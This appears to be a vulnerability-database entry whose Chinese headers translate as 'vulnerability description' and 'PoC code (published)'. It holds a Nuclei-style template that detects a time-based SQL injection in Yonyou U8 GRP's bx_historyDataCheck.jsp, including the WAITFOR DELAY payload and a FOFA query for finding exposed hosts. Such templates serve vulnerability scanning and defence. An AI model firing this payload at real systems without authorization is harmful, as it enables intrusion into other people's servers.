漏洞描述
Yonyou U8 Grp contains a SQL injection vulnerability.
yonyou-u8-sqli: Yonyou U8 bx_historyDataCheck - SQL Injection
PoC代码[已公开]
id: yonyou-u8-sqli
info:
name: Yonyou U8 bx_historyDataCheck - SQL Injection
author: xianke
severity: high
description: |
Yonyou U8 Grp contains a SQL injection vulnerability.
reference:
- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/yonyou-grp-u8-bx_historyDataChecks-sqli.yaml
- https://github.com/MD-SEC/MDPOCS/blob/main/Yongyou_Grp_U8_bx_historyDataCheck_Sql_Poc.py
metadata:
verified: true
max-request: 2
fofa-query: icon_hash="-299520369"
tags: time-based-sqli,yonyou,grp,sqli,vuln
flow: http(1) && http(2)
http:
- raw:
- |
GET /login.jsp HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
words:
- 'GRP-U8'
internal: true
- raw:
- |
@timeout: 20s
POST /u8qx/bx_historyDataCheck.jsp HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
userName='%3bWAITFOR+DELAY+'0%3a0%3a5'--%26ysnd%3d%26historyFlag%3d
matchers:
- type: dsl
dsl:
- 'duration_2>=6'
- 'contains(content_type, "text/html")'
condition: and
# digest: 4b0a00483046022100cd3c5dce68df769eeec807997c6ddaf39a9937f01d54ac34ade38f7a79d65dd9022100bc5f837c96c59073a31c1432bd14e796310537d8fa88c8ff643916b864ec3a6e:922c64590222798bb761d5b6d8e72950